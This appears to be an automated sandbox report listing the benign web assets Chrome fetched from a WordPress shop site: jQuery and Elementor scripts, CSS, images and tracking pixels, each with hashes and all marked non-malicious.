                                                                                                          Preview:/*! js-Offcanvas - v1.2.11 - 2019-10-16.jQuery Accesible Offcanvas Panels. * https://github.com/vmitsaras/js-offcanvas. * Copyright (c) 2019 Vasileios Mitsaras (@vmitsaras). * MIT License */.!function(a){"use strict";var b=a.utils||{};b.classes={hiddenVisually:"u-hidden-visually",modifier:"--",isActive:"is-active",isClosed:"is-closed",isOpen:"is-open",isClicked:"is-clicked",isAnimating:"is-animating",isVisible:"is-visible",hidden:"u-hidden"},b.keyCodes={BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,PAGE_DOWN:34,PAGE_UP:33,PERIOD:190,RIGHT:39,SPACE:32,TAB:9,UP:38},b.a11yclick=function(a){var c=a.charCode||a.keyCode,d=a.type;return"click"===d||"keydown"===d&&(c===b.keyCodes.SPACE||c===b.keyCodes.ENTER||void 0)},b.a11yclickBind=function(a,c,d){a.on("click."+d+" keydown."+d,function(e){b.a11yclick(e)&&(e.preventDefault(e),c&&"function"==typeof c&&c.call(),a.trigger("clicked."+d))})},b.supportTransition="transition"in document.documentElement.style||"Webk
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):43
                                                                                                          Entropy (8bit):2.7374910194847146
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:CU9yltxlHh/:m/
                                                                                                          MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                          SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                          SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                          SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://mc.yandex.com/sync_cookie_image_decide?token=10592.GPKdRjFar50ks68nMgDMTNh_wG0ewvoBb5WFaVYpeThNjYbMMU22DX6mii9UnTHw9FN-JNgTYMgrQnvw1sZlPEa5vnF-XX3dsVTna68gnTNXPSVfT3avn68Ld8Ozy0gjWp5fLjSMoYcFAl6h2jLUEcZyti5eYjCsrlKnjMjA07HCAC4iyqOKb6Z_Kjwbatrrm_OaoRNqajFktzxNA81A1meFjp8EJgefM5kh_CA4wco%2C.NQSB1bMUw3gAXNVO53Raj0C340c%2C
                                                                                                          Preview:GIF89a.............!.......,...........D..;
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):68
                                                                                                          Entropy (8bit):4.148986922130799
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:yionv//thPlE+tJ8/VeyGFFHDhlljp:6v/lhPfA/0y2Vlljp
                                                                                                          MD5:2A637D3D825673C0E3462FA4ED9A1C5C
                                                                                                          SHA1:81668D396DA22832D75A986407FF10035E0D5899
                                                                                                          SHA-256:69539B5B3777CFFDA28A66D7F2AA9B17C91EE1EC8FD50C00C442AF91753A60F7
                                                                                                          SHA-512:DC7C40381B3D22919E32C1B700CCB77B1B0AEA2690642D01C1AC802561E135C01D5A4D2A0EA18EFC0EC3362E8C549814A10A23563F1F56BD62AEE0CED7E2BD99
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.PNG........IHDR.....................IDAT.Wc``......h&Y.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (13479)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13577
                                                                                                          Entropy (8bit):5.272065782731947
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:5rprDN+sag6ifKIUpQI99P1tLm9kdgyq1+J3aCJQ+h4MPLORq:5rprxaefKI0LP19m4q1WW+h4Mjp
                                                                                                          MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                          SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                          SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                          SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (18843)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18878
                                                                                                          Entropy (8bit):5.200208004249851
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:u2Rq5yjN1V02mEHrJDzWp3D0bMpOt3PPD71ijeE9OWj:LqIbV0sHG3D0dD71Uj
                                                                                                          MD5:16699A7F2AEBE8D676042962C3BB5537
                                                                                                          SHA1:9697E3FE2D92C79DEBD82478603D4B59FC249714
                                                                                                          SHA-256:5152316FADE8C592FBFD38BC491E059464D967D3D31A582B0C885C0961DEED30
                                                                                                          SHA-512:49AE27B783F99B50A7FE43F084554EDBC87E430982C736C425FDFC26D1550C19B28C6127D3C8A730A31317ADF90008CFE5DBDDD27ECC6E1096D5520704ED8621
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*! This file is auto-generated */.!function(n,t){var r,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define("underscore",t):(n="undefined"!=typeof globalThis?globalThis:n||self,r=n._,(e=n._=t()).noConflict=function(){return n._=r,e})}(this,function(){var n="1.13.7",t="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,V=Object.prototype,F="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=V.toString,q=V.hasOwnProperty,r="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=r&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (16050), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):16050
                                                                                                          Entropy (8bit):5.288065661034305
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:OYhYqYReYYzlYbI7B5+zTmVQ9nZmg99c9o2ex4bxRehhhYPpoxTQxIPP9m:OYhYqYReYklHd5mTIQ9njG9bbCOafo
                                                                                                          MD5:C480693CDE41218F9DF213280ED0EC8F
                                                                                                          SHA1:63763B3757A54503D5D04FA2D9C67396BA47AD64
                                                                                                          SHA-256:682B309B932A8D2B8D288D972F4BFA379CC761E64B7A633CA3CD7E10D56AD5B0
                                                                                                          SHA-512:1D37C2D59B010B9557B85084DBA3C685DD5B779CA9F14CE1C25E7E9E55711D02C21710690B2272D06741D497037E52CB6E49CF3867BCF21503CB774A60EB981F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/pixel-caffeine/build/frontend.js?ver=2.3.3
                                                                                                          Preview:!function(){var t={1989:function(t,n,e){var r=e(1789),o=e(401),a=e(7667),c=e(1327),i=e(1866);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},8407:function(t,n,e){var r=e(7040),o=e(4125),a=e(2117),c=e(7518),i=e(4705);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},7071:function(t,n,e){var r=e(852)(e(5639),"Map");t.exports=r},3369:function(t,n,e){var r=e(4785),o=e(1285),a=e(6e3),c=e(9916),i=e(5265);function u(t){var n=-1,e=null==t?0:t.length;for(this.clear();++n<e;){var r=t[n];this.set(r[0],r[1])}}u.prototype.clear=r,u.prototype.delete=o,u.prototype.get=a,u.prototype.has=c,u.prototype.set=i,t.exports=u},2705:function(t,n,e){var r=e(5639).Symbol;t.exports=r},6874:function(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (14238)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):14277
                                                                                                          Entropy (8bit):5.115717878518809
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:BeAjA6wA9CrSX4cR8C8WwJMg35LI1S6SC8lwE5nYJe3VW+V3QMoF7ehetdQPR+SN:BeAjA6wA9CrSX4cR8+8Mc5LI1/SC8lw6
                                                                                                          MD5:2D4C5681F3A523F916C94C669F34F8A9
                                                                                                          SHA1:2E9E6B41841915BE50F08B6985FF60F8725906A0
                                                                                                          SHA-256:F63F130E6C972C9C2A733C0C9BE0BE21F1A532E323600F9C7608CB96BE30C360
                                                                                                          SHA-512:B99DD774B3B39FF2FE3E499B62DD2CA38EB5369181C2F031468A52801CCE94A680738C3A20F65B4E546434E38DEDA68142EF917A7A158602ABFF46694B68024E
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.6.1
                                                                                                          Preview:/*! elementor - v3.6.1 - 23-03-2022 */.(self.webpackChunkelementor=self.webpackChunkelementor||[]).push([[354],{7914:e=>{e.exports=function _interopRequireDefault(e){return e&&e.__esModule?e:{default:e}},e.exports.default=e.exports,e.exports.__esModule=!0},381:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;t.default=(e,t)=>{t=Array.isArray(t)?t:[t];for(const n of t)if(e.constructor.name===n.prototype[Symbol.toStringTag])return!0;return!1}},8135:(e,t)=>{"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.ViewModule{getDefaultSettings(){return{selectors:{elements:".elementor-element",nestedDocumentElements:".elementor .elementor-element"},classes:{editMode:"elementor-edit-mode"}}}getDefaultElements(){const e=this.getSettings("selectors");return{$elements:this.$element.find(e.elements).not(this.$element.find(e.nestedDocumentElements))}}getDocumentSettings(e){let t;if(this.isEdit){t={
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):13296
                                                                                                          Entropy (8bit):4.919865387106982
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:/nErriuF/aQ9KINbVF2MFGuiFX4r3JZ0WdaeF74c35NEs4:f+FSEKI5VF2MFGLFor5ZOiXz4
                                                                                                          MD5:4517E63F3C7A15E1696BB38DB75FEA2A
                                                                                                          SHA1:5B2EAD1123946DE7D8A5786C660DEFCFCE7699B8
                                                                                                          SHA-256:683C3601C8C673010044E3FBAD99C8DA5741FBF5F2B93C1B647E43AF5222B8CA
                                                                                                          SHA-512:533727136815331ECE0AE5C72CD572A0494BF2FD901803A27489FA3C8CB477C7225AEA8C06C82907841F29CBA3F116C7AE58E781FB7D4FCADE9A1B45F7DD9195
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/css/ion.rangeSlider.css?ver=3.3.0
                                                                                                          Preview:/**.Ion.RangeSlider, 2.3.1.. Denis Ineshin, 2010 - 2019, IonDen.com.Build date: 2019-12-19 16:51:02.*/..irs {. position: relative;. display: block;. -webkit-touch-callout: none;. -webkit-user-select: none;. -khtml-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. user-select: none;. font-size: 12px;. font-family: Arial, sans-serif;.}..irs-line {. position: relative;. display: block;. overflow: hidden;. outline: none !important;.}..irs-bar {. position: absolute;. display: block;. left: 0;. width: 0;.}..irs-shadow {. position: absolute;. display: none;. left: 0;. width: 0;.}..irs-handle {. position: absolute;. display: block;. box-sizing: border-box;. cursor: default;. z-index: 1;.}..irs-handle.type_last {. z-index: 2;.}..irs-min,..irs-max {. position: absolute;. display: block;. cursor: default;.}..irs-min {. left: 0;.}..irs-max {. right: 0;.}..irs-from,..irs-to,..irs-single {. position: absolute;. display: block;. top: 0;. left:
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (34810), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):34810
                                                                                                          Entropy (8bit):4.6370664585525265
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:c243HN+R4L5BZjMA2In3NOpYD/BrEtwCslZzprhrhMYEwkQEw9C7RcIt6ZNcWzRk:c243HN+R4L/ZjMA2In3NOpYD/BrEtwCf
                                                                                                          MD5:C5147D091F6815E5BE3BD0F41172F598
                                                                                                          SHA1:4F393A8FD72BDC2117D852AEF45F3D44961089FF
                                                                                                          SHA-256:8ACE84D8E9B1045932E9609DDA96CAC49A1C3A6ACBF70AC00F8DDD022F6A326D
                                                                                                          SHA-512:3BBD8F277DB6FF64547EC0AF02A1DA6308AE1CBFE4436D85F88FB7DBB46C435740F7377D4B79E33778348F800BF02A88B6337287BFB40AF1DF5D76B38928BEA4
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/themes/ciena/assets/css/customize.css?ver=1.0.8
                                                                                                          Preview:body{font-family: Mulish;font-weight: 400;font-size: 16px;line-height: 24px;letter-spacing: 0px;font-style: normal;font-weight: 400;font-style: normal;}body {color:#6d6d6d;}body button.close svg { fill: #6d6d6d;}h1, .h1{font-family: Mulish;font-weight: 400;font-size: 2.5rem;line-height: 1.5;letter-spacing: 0px;text-transform: none;font-style: normal;font-weight: 400;font-style: normal;}h1, .h1 {color:#000000;}h1, .h1 button.close svg { fill: #000000;}h1 svg.stroke, .h1 svg.stroke{stroke:#000000;}h1 svg.fill, .h1 svg.fill{fill:#000000;}h2, .h2{font-family: Mulish;font-weight: 400;font-size: 2rem;line-height: 1.5;letter-spacing: 0px;text-transform: none;font-style: normal;font-weight: 400;font-style: normal;}h2, .h2 {color:#000000;}h2, .h2 button.close svg { fill: #000000;}h2 svg.stroke, .h2 svg.stroke{stroke:#000000;}h2 svg.fill, .h2 svg.fill{fill:#000000;}h3, .h3{font-family: Mulish;font-weight: 400;font-size: 1.75rem;line-height: 1.5;letter-spacing: 0px;text-transform: none;font-style
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1224x1728, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):246541
                                                                                                          Entropy (8bit):7.973655222882582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:y/cGvIhZJ/Jzo0Q/R34cjHHJZ8KCo/sjQp8:/GwhDJA534c1Z5Co/sjQu
                                                                                                          MD5:509D83CFDE8235795E8CEB6DE411504B
                                                                                                          SHA1:A5780FA5F5790F2927A51E2CBCADE8408F58F158
                                                                                                          SHA-256:4FCFD63169DB70C210723F4CBDDB2B22FF2CF376783B2A84CA0CA8705632CE14
                                                                                                          SHA-512:F0FA2566B6BEB5CF814876C0BA79F3C379F608E0F61D7C3BE8AD628AC89E7FE41E2B641378051A9748196048A911DD59610FB02DE9270890A8A7A712EF65FF6F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A4AE2121500111ED985FFC254E022163" xmpMM:InstanceID="xmp.iid:A4AE2120500111ED985FFC254E022163" xmp:CreatorTool="Adobe Photoshop 2022 Windows"> <xmpMM:DerivedFrom stRef:instanceID="D54CF9080B66A8E3C4F5D5E20E8D9D7A" stRef:documentID="D54CF9080B66A8E3C4F5D5E20E8D9D7A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 1224x1728, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):246541
                                                                                                          Entropy (8bit):7.973655222882582
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:y/cGvIhZJ/Jzo0Q/R34cjHHJZ8KCo/sjQp8:/GwhDJA534c1Z5Co/sjQu
                                                                                                          MD5:509D83CFDE8235795E8CEB6DE411504B
                                                                                                          SHA1:A5780FA5F5790F2927A51E2CBCADE8408F58F158
                                                                                                          SHA-256:4FCFD63169DB70C210723F4CBDDB2B22FF2CF376783B2A84CA0CA8705632CE14
                                                                                                          SHA-512:F0FA2566B6BEB5CF814876C0BA79F3C379F608E0F61D7C3BE8AD628AC89E7FE41E2B641378051A9748196048A911DD59610FB02DE9270890A8A7A712EF65FF6F
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/2022/10/SLIDER-HOME-AVmob.jpg
                                                                                                          Preview:......JFIF..............Exif..II*.................http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A4AE2121500111ED985FFC254E022163" xmpMM:InstanceID="xmp.iid:A4AE2120500111ED985FFC254E022163" xmp:CreatorTool="Adobe Photoshop 2022 Windows"> <xmpMM:DerivedFrom stRef:instanceID="D54CF9080B66A8E3C4F5D5E20E8D9D7A" stRef:documentID="D54CF9080B66A8E3C4F5D5E20E8D9D7A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (326)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):47503
                                                                                                          Entropy (8bit):4.578612796150673
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:F37SUuvHLW+lt6o6Yy8KUPNw/NHYGEPQtqmIrbWtGAQC:FwoxYyjUPNw/NHYCrwAQC
                                                                                                          MD5:85E54FA10ECCE4F46CF83953EB1431A2
                                                                                                          SHA1:56EC60080765E2B1C71BF7B86BD349825D0BA78E
                                                                                                          SHA-256:FA8A837C69930D75A3C3A05C803A8271BD57AE5DD61FBE81D4341F38D1F58165
                                                                                                          SHA-512:F97657186A18B4092889AA1CB49D2767DF2B0BA15C0F24130A23B061A350B22D780C06589643E2E8DEC4CCF726FB51EA993C62FA59E211C9E589C295F78F0BF9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/woocommerce-products-filter/js/chosen/chosen.jquery.js?ver=3.3.0
                                                                                                          Preview:/*!.Chosen, a Select Box Enhancer for jQuery and Prototype.by Patrick Filler for Harvest, http://getharvest.com..Version WOOF Custom.Full source at https://github.com/harvesthq/chosen.Copyright (c) Harvest http://getharvest.com..MIT License, https://github.com/harvesthq/chosen/blob/master/LICENSE.md.This file is generated by `grunt build`, do not edit it by hand..*/.."use strict";..(function() {. var $, AbstractChosen, Chosen, SelectParser,. bind = function(fn, me){ return function(){ return fn.apply(me, arguments); }; },. extend = function(child, parent) { for (var key in parent) { if (hasProp.call(parent, key)) child[key] = parent[key]; } function ctor() { this.constructor = child; } ctor.prototype = parent.prototype; child.prototype = new ctor(); child.__super__ = parent.prototype; return child; },. hasProp = {}.hasOwnProperty;.. SelectParser = (function() {. function SelectParser() {. this.options_index = 0;. this.parsed = [];. }.. SelectParser.prototy
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2464), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):4.7583405079454115
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ml0g5lLAn8n66lRvb+goyIdnFIOIXMEmI3hF2OR:ml0g5lLAn8n3lRvb+goyIdF5IXMEmI3t
                                                                                                          MD5:FCD267D053339C17EFB525149FF4630E
                                                                                                          SHA1:F6F93B89804CC4283CB560A50F1E7AB6D2B1010A
                                                                                                          SHA-256:0F2F31216726DB1E48290822582C309027C5977142EC44AEAD68D3588B196A85
                                                                                                          SHA-512:4F1E92305E1039186B42A72732A5FEA77D737E4E3B6B2D8DB6C0B93C4E329D835B6D80E1DEF07A616A3721F29325A7A1EF10A3CFD0423EC38BC638519AB2E695
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/uploads/elementor/css/post-8052462574847.css?ver=1725434764
                                                                                                          Preview:.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-container{max-width:900px;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4:not(.elementor-motion-effects-element-type-background), .elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-color:#FFFFFF0A;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4{transition:background 0.3s, border 0.3s, border-radius 0.3s, box-shadow 0.3s;padding:3% 3% 3% 3%;}.elementor-8052462574847 .elementor-element.elementor-element-7b44cb4 > .elementor-background-overlay{transition:background 0.3s, border-radius 0.3s, opacity 0.3s;}.elementor-8052462574847 .elementor-element.elementor-element-3c2fdab{text-align:center;}.elementor-8052462574847 .elementor-element.elementor-element-4679a28{text-align:left;}.elementor-8052462574847 .elementor-element.elementor-element-4679a28 .elementor-headi
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (10150)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10332
                                                                                                          Entropy (8bit):5.175424441862342
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:TrxXtNLOw5Lx/jq/XOnAm5M5f6IyfGmojJnd9:TrxXt4AN/DNxojJnP
                                                                                                          MD5:6BDD4DCA7CB09218E1860E6E0CA8A823
                                                                                                          SHA1:DFF6AC08D3CCF6F1D4F31C2D77FFA19E5ED112EE
                                                                                                          SHA-256:B7F28F2464E085279A304D2ABEE8F0C89F82077338DFE0DD44882ED0D53D018C
                                                                                                          SHA-512:69C128B655B22B150090D585FAE2D1E2375400EDAC8A8F61A9FD12CBEE07D464AF43820BBF32E21AD55FF12087F9172F51F70943E301A2301C2E5E3A90993990
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:/*!. * jQuery UI Effects 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","./jquery-var-for-color","./vendor/jquery-color/jquery.color","./version"],t):t(jQuery)}(function(u){"use strict";var s,o,r,a,c,e,n,i,f,l,d="ui-effects-",h="ui-effects-style",p="ui-effects-animated";function m(t){var e,n,i=t.ownerDocument.defaultView?t.ownerDocument.defaultView.getComputedStyle(t,null):t.currentStyle,o={};if(i&&i.length&&i[0]&&i[i[0]])for(n=i.length;n--;)"string"==typeof i[e=i[n]]&&(o[e.replace(/-([\da-z])/gi,function(t,e){return e.toUpperCase()})]=i[e]);else for(e in i)"string"==typeof i[e]&&(o[e]=i[e]);return o}function g(t,e,n,i){return t={effect:t=u.isPlainObject(t)?(e=t).effect:t},"function"==typeof(e=null==e?{}:e)&&(i=e,n=null,e={}),"number"!=typeof e&&!u.fx.speeds[e]||(i=n,n=e,e={}),"function"==typeof n&
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (347)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):23719
                                                                                                          Entropy (8bit):3.994925954278077
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:vsonkuvDiU0xpzyNqcN2zt3N2HpNNEecpwFYyo822eyKZsgtbUNeHpNNELtOYhk7:vsonkuvDiU0xpzyNqcNUNwwwFYyo822I
                                                                                                          MD5:0A718D8ABA22F4B5D22F4346D970120C
                                                                                                          SHA1:5DCB8B3D770A2E924EFF24B5E8E867ABAD71665F
                                                                                                          SHA-256:3D19428D15E940E1DDB3A686D343B93CACF131DBC995309FB0648426812A9A5F
                                                                                                          SHA-512:F4CB61FD5D5F298D42F96B508121BFA73E440AC5B67FAC190D19E856EB9D91A182B94B2AAB3E974BD74B1F393F45D06D477D0B100AEA3233B3AC69B2B92898A9
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://annavirgili.com/wp-content/plugins/fami-templatekits/assets/js/fmtpl-addons.js?ver=1.0.4
                                                                                                          Preview:(function ($, elementor) {. "use strict";. var Elementskit = {. init: function () {. var widgets = {. 'fmtpl-images-gallery.default': Elementskit.Gallery_init,. 'fmtpl-carousel-reviews.default': Elementskit.Carousel,. 'fmtpl-carousel-images.default': Elementskit.Carousel,. 'fmtpl-carousel-products.default': Elementskit.Carousel,. 'fmtpl-carousel-posts.default': Elementskit.Carousel,. 'fmtpl-carousel-testimonial.default': Elementskit.Carousel,. //'fmtpl-products-tabs.default': Elementskit.Carousel,. 'fmtpl-countdown.default': Elementskit.CountDown,. 'fmtpl-deal.default': Elementskit.CountDown,. 'fmtpl-carousel-product-banner.default': Elementskit.Carousel,. 'fmtpl-carousel-categories-banner.default': Elementskit.Carousel,. 'fmtpl-writer-banner.default': Elementskit.TextRotate,.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (2530)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):223515
                                                                                                          Entropy (8bit):5.553312968556749
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:EhZFrjSUihzA1L0l6RKsRm1t6hTf/9q9bdTOmQyDy4iGNTK:wGUih8aiZD989OmQyDy4bm
                                                                                                          MD5:AF03938FB9E8798E45F3AEFECEC595D1
                                                                                                          SHA1:5D725F1A53BD321A71A13179969713B7E5C22EEC
                                                                                                          SHA-256:B664AC7625FF3CF00CE3169AB85800CC2D8A7E5D73386FE379784305BCCDFAD5
                                                                                                          SHA-512:BDDCEC51BCEE62503536D4035F8003C0A79246C1477B050BFD21511EA5A0317E7CE3CAF05A8F77AAB310024E4620492E2F659331C9BCDE46410EC82B83C3B7C3
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-K268W3Z
